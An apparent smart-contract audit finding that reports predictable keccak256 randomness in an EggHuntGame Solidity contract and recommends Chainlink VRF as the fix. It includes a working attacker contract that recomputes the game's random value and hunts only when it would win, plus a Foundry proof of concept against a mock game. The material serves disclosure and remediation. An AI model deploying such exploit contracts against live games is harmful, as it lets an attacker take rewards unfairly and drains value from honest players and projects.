Eggstravaganza

First Flight #37
Beginner Friendly, Solidity
100 EXP
Submission Details
Severity: high
Valid

Title Insecure Pseudo-Randomness in Egg Hunting Mechanism Allows Predictable Egg Discovery

Summary

The EggHuntGame contract decides whether a hunt finds an egg from keccak256 over block.timestamp, block.prevrandao, msg.sender and eggCounter. All four inputs are public before the transaction executes, and msg.sender is chosen by the caller, so the outcome can be computed in advance and a caller can submit only winning hunts. This removes the intended probability, guarantees egg finds and NFT mints for the attacker, and can lead to excessive NFT issuance that devalues the project. A verifiable randomness source such as Chainlink VRF is recommended to fix this high-severity issue.

Vulnerability Details

Code Affected

uint256 random = uint256(
    keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggCounter))
) % 100;
if (random < eggFindThreshold) {
    eggCounter++;
    eggsFound[msg.sender] += 1;
    eggNFT.mintEgg(msg.sender, eggCounter);
    emit EggFound(msg.sender, eggCounter, eggsFound[msg.sender]);
}

Description

The contract derives a pseudo-random number (random) from keccak256 over the following inputs:

  • block.timestamp: known to the caller before the transaction is submitted. On proof-of-stake chains it is fixed by the slot; on proof-of-work chains a miner can nudge it by a few seconds. Either way it is not secret.

  • block.prevrandao: the RANDAO value of the previous block, public as soon as that block is published and therefore identical for every transaction in the current block.

  • msg.sender: chosen by the caller, who can also deploy several contracts and pick whichever address hashes to a winning value.

  • eggCounter: a public state variable, readable by anyone.

These inputs are transparent (and msg.sender is attacker-chosen), so random is fully predictable. Attackers can:

  • Recompute random inside their own transaction, in the same block, and call the game only when random < eggFindThreshold. This is exact, because every input is identical for the check and for the game's own computation.

  • Simulate random off-chain from the current chain state and submit only winning transactions; this is the same idea, but it is only reliable if the transaction lands in the predicted block.

  • On proof-of-work chains, miners can additionally tweak block.timestamp within the allowed drift to favor themselves.

This breaks the intended probabilistic mechanic (for example a 50% chance per hunt when eggFindThreshold = 50): an attacker turns it into a 100% chance on every hunt they submit and can mint NFTs at will.

Exploit Example

An attacker contract (hunt() is an assumed name for the game's egg-hunting function; eggCounter and eggFindThreshold are assumed to be public state variables with auto-generated getters):

pragma solidity ^0.8.20;

interface IEggHuntGame {
    function eggCounter() external view returns (uint256);
    function eggFindThreshold() external view returns (uint256);
    function hunt() external; // assumed function name
}

contract EggHuntExploit {
    IEggHuntGame public immutable game;
    constructor(address gameAddress) { game = IEggHuntGame(gameAddress); }
    function attack() external {
        // Same inputs the game hashes: inside hunt(), msg.sender is this contract.
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao, address(this), game.eggCounter()))
        ) % 100;
        if (random < game.eggFindThreshold()) {
            game.hunt(); // guaranteed egg find (and mint) in this block
        }
    }
}

  • Steps: deploy the contract and call attack() once per block. It only calls hunt() in blocks where the recomputed random is below the threshold, so every hunt it makes succeeds; replacing the if with a require makes losing calls revert cleanly instead of spending gas on a no-op. Deploying several copies with different addresses yields a winning msg.sender in almost every block. If mintEgg uses _safeMint, the attacker contract must also implement onERC721Received to accept the NFT.
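A Foundry test, added here as an illustration and not part of the original submission, demonstrates the attack end to end. Because the real EggHuntGame's function names are not given on this page, it reproduces the quoted hashing logic in a MockEggHuntGame (the hunt() name, the constructor threshold and the absence of NFT minting are assumptions of the mock) and shows both the revert-if-losing pattern and grinding over several attacker addresses:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Mock that reproduces the vulnerable hashing logic quoted in the finding.
// hunt() is an assumed name; minting is omitted to keep the PoC self-contained.
contract MockEggHuntGame {
    uint256 public eggCounter;
    uint256 public eggFindThreshold;
    mapping(address => uint256) public eggsFound;

    constructor(uint256 threshold) { eggFindThreshold = threshold; }

    function hunt() external {
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggCounter))
        ) % 100;
        if (random < eggFindThreshold) {
            eggCounter++;
            eggsFound[msg.sender] += 1;
        }
    }
}

// Attacker: recompute the game's number and revert instead of wasting a losing hunt.
contract EggHuntExploit {
    MockEggHuntGame public immutable game;
    constructor(MockEggHuntGame g) { game = g; }

    // Exactly the expression the game evaluates; msg.sender inside hunt() is this contract.
    function wins() public view returns (bool) {
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao, address(this), game.eggCounter()))
        ) % 100;
        return random < game.eggFindThreshold();
    }

    function attack() external {
        require(wins(), "losing block");
        game.hunt();
    }
}

contract EggHuntExploitTest is Test {
    MockEggHuntGame game;
    // msg.sender is a hash input, so several attacker addresses give several draws per block.
    EggHuntExploit[4] attackers;

    function setUp() public {
        game = new MockEggHuntGame(10); // nominal 10% chance per hunt
        for (uint256 i = 0; i < attackers.length; i++) {
            attackers[i] = new EggHuntExploit(game);
        }
    }

    function testAttackerNeverLoses() public {
        uint256 submitted;
        uint256 eggsBefore = game.eggCounter();
        for (uint256 b = 0; b < 200; b++) {
            // Advance one block. prevrandao and timestamp are public before any tx in it executes.
            vm.roll(block.number + 1);
            vm.warp(block.timestamp + 12);
            vm.prevrandao(keccak256(abi.encode(b)));
            for (uint256 i = 0; i < attackers.length; i++) {
                if (attackers[i].wins()) {
                    attackers[i].attack();
                    submitted++;
                }
            }
        }
        // Every submitted hunt found an egg: a 100% hit rate against a "10%" game.
        assertEq(game.eggCounter() - eggsBefore, submitted);
        assertGt(submitted, 0);
    }
}
```

Run with forge test -vv. The equality assertion holds for any threshold value, because the attacker evaluates exactly the expression the game evaluates against the same block state; the threshold only changes how many blocks produce a winning attacker address.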

Impact

  • Fairness Compromised: Attackers succeed on every hunt they submit, leaving honest players, who hunt at the nominal probability, at a structural disadvantage.

  • NFT Over-Minting: Uncontrolled minting could exhaust an NFT supply cap or flood the market, devaluing Egg NFTs.

  • Economic Loss: If rewards or fees are tied to minting, attackers could drain contract resources.

  • Trust Erosion: Players may abandon the game if its core mechanic is exploitable, damaging the project’s reputation.

Tools Used

No specific tools were employed to identify this vulnerability.

Recommendations

Replace the on-chain hash with a verifiable randomness source such as Chainlink VRF: hunt() should only request a random word, and the egg/no-egg decision should be made in the coordinator-invoked fulfillment callback, so no input that the caller controls or can read in advance determines the outcome. Reject a new hunt while one is pending for the same player so that requests cannot be spammed.

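A hardened version of the game, added here as an illustration and not code from the project, using Chainlink VRF v2 in a request/fulfill pattern. The import paths follow the @chainlink/contracts package layout and may differ by package version; the coordinator address, keyHash and subscription id are deployment-time assumptions, and IEggNFT mirrors the mintEgg call quoted in the finding:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/vrf/VRFConsumerBaseV2.sol";
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/vrf/interfaces/VRFCoordinatorV2Interface.sol";

// Assumed interface matching the eggNFT.mintEgg(msg.sender, eggCounter) call in the finding.
interface IEggNFT {
    function mintEgg(address to, uint256 tokenId) external;
}

contract EggHuntGameVRF is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable coordinator;
    IEggNFT public immutable eggNFT;
    bytes32 private immutable keyHash;          // gas lane, per network (assumed)
    uint64 private immutable subscriptionId;    // funded VRF subscription (assumed)
    uint32 private constant CALLBACK_GAS_LIMIT = 200_000;
    uint16 private constant REQUEST_CONFIRMATIONS = 3;

    uint256 public eggCounter;
    uint256 public eggFindThreshold;
    mapping(address => uint256) public eggsFound;
    mapping(uint256 => address) public requestToHunter; // VRF requestId => player
    mapping(address => bool) public hasPendingHunt;

    event HuntRequested(address indexed hunter, uint256 requestId);
    event EggFound(address indexed hunter, uint256 eggId, uint256 totalFound);
    event EggMissed(address indexed hunter);

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId, address _eggNFT, uint256 _threshold)
        VRFConsumerBaseV2(_coordinator)
    {
        coordinator = VRFCoordinatorV2Interface(_coordinator);
        keyHash = _keyHash;
        subscriptionId = _subId;
        eggNFT = IEggNFT(_eggNFT);
        eggFindThreshold = _threshold;
    }

    // Step 1: the player commits to a hunt. Nothing the caller controls enters the random word,
    // and the outcome is unknown to everyone until the coordinator delivers it.
    function hunt() external {
        require(!hasPendingHunt[msg.sender], "hunt already pending");
        hasPendingHunt[msg.sender] = true;
        uint256 requestId = coordinator.requestRandomWords(
            keyHash, subscriptionId, REQUEST_CONFIRMATIONS, CALLBACK_GAS_LIMIT, 1
        );
        requestToHunter[requestId] = msg.sender;
        emit HuntRequested(msg.sender, requestId);
    }

    // Step 2: only the coordinator can reach this (VRFConsumerBaseV2 enforces the caller),
    // and the word it passes has been proof-verified on-chain.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        address hunter = requestToHunter[requestId];
        if (hunter == address(0)) return; // unknown request: do not revert inside the callback
        delete requestToHunter[requestId];
        hasPendingHunt[hunter] = false;

        if (randomWords[0] % 100 < eggFindThreshold) {
            eggCounter++;
            eggsFound[hunter] += 1;
            eggNFT.mintEgg(hunter, eggCounter);
            emit EggFound(hunter, eggCounter, eggsFound[hunter]);
        } else {
            emit EggMissed(hunter);
        }
    }
}
```

The callback returns instead of reverting on an unknown request and keeps its gas use under CALLBACK_GAS_LIMIT, because a reverting callback is recorded by the coordinator as a failed fulfillment and is not retried. If mintEgg can itself revert (for example a _safeMint to a contract without onERC721Received), record the result in the callback and let the player claim the NFT in a separate transaction.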
Updates

Lead Judging Commences

m3dython Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Insecure Randomness

Insecure methods to generate pseudo-random numbers
